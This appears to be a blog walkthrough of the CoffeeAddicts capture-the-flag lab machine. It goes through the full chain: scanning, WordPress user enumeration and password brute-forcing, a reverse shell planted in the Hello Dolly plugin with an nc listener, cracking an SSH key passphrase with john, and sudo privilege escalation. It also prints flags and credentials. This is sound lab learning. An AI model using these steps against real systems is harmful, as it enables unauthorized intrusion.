How I took down CoffeeAddicts Machine

Overview:

Target Machine IP Address: 192.168.56.108
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root

1. To get user flag
2. To get root flag
3. To get root access

Level: Easy/Medium 

Easy/Medium

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.128

nmap -sC -sV -p- -Pn 192.168.56.128 -o nmap.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 fc:13:6a:6b:9b:e3:68:18:24:a1:de:2b:28:1e:61:5f (RSA)
| 256 c1:34:94:94:71:71:9c:6e:83:a6:be:c9:2a:1b:3f:d7 (ECDSA)
|_ 256 9a:cc:ce:ce:b8:2f:08:bb:2b:99:b6:25:3f:ec:44:61 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1. HTTP (80/tcp)

I made an entry in my /etc/hosts as it is mention here. And then I visit the site url http://coffeeaddicts.thm/

Let’s view source code

Decrypt the string. If you are wondering why I assume the string is base64. Almost 99% of the time it is sure that the string ends with “==” is base64. Besides, you can use other tools to identify the string as well.

echo "VEhNe2ltX3RoZV9saXphcmRfa2luZ30gaHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==" | base64 -d

THM{im_the_lizard_king} https://www.youtube.com/watch?v=dQw4w9WgXcQ

I am not sure whether the string is just a bogus or it is a sub-directory. Let’s make a note of it and then evaluate the directories.

gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -o gobuster.log

dirsearch -u http://coffeeaddicts.thm -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

Yes, we found that there is a wordpress instance.   http://coffeeaddicts.thm/wordpress/

I know the username is gus (because it is showing under each articles and if you want to do it more technically then you can pass this string in the url http://coffeeaddicts.thm/wordpress/?author=1).  or you can use wpscan and try the following command

wpscan --url http://coffeeaddicts.thm/wordpress/ --plugins-detection aggressive -e u -o wpscan_u.log

By the way, looks like there is a password hint. However I must confess that I can’t make anything out of it.  That’s why I though I will first try with rockyou.txt for the password list and do a wpscan bruteforce.

It has be close to 50 minutes but I didn’t get anything. So I thought I will let it run while I do manual enumeration.

password: gusineedyouback

I tried my favourite technique that is to hide the content of the php-reverse-shell.php inside the 404.php however, this time I am not sure why but I couldn’t. Thanks to this, I now found a new way to hide the script i.e., I have hidden the script within the hello dolly plugin. Nevertheless, you should be careful that you are not suppose to override the comment of the plugin (which is existed there already in the plugin).

Yes, you need to modify the IP address on which you are going to receive the reverse connection from the Target Machine. I usually keep the default port number.

On Kali Machine (type the following command):

nc -lvp 1234

As soon as I activate the Hello Dolly Plugin…I got the reverse connection on Kali Machine

I see that there are two users…

Users:

badbyte 
gus

user flag: THM{s4v3_y0uR_Cr3d5_b0i}

I did cd badbyte and saw that .ssh contains private ssh private key but it is password protected. Therefore, I had to google and I found this article useful

sudo updatedb

locate ssh2john 
cp /usr/share/john/ssh2john.py .
python ssh2john.py id_rsa > id_rsa.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

john --show id_rsa.hash

Password: password

ssh badbyte@192.168.56.108 -i id_rsa

sudo -l

(root) /opt/BadByte/shell
sudo /opt/BadByte/shell       #remember the password is password 
bash 
cd /root 
cat root.txt

root flag: THM{im_the_shell_master}

That’s all guys 🙂

 

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Menu